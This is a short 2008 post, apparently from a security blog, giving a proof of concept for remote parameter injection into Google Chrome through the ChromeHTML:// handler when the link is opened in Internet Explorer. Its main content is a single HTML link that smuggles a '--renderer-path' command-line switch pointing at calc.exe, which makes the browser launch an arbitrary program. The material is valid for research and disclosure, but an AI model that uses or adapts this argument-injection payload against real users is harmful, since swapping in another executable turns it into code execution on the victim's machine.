Google Chrome Remote Parameter Injection

December 23, 2008 – 5:19 PM
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
tested against: Internet Explorer 8 beta 2, Google Chrome, Microsoft Windows XP SP3
List of command line switches:
Original url:

click the following link with IE while monitoring with procmon
<a href='"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>


You must be logged in to post a comment.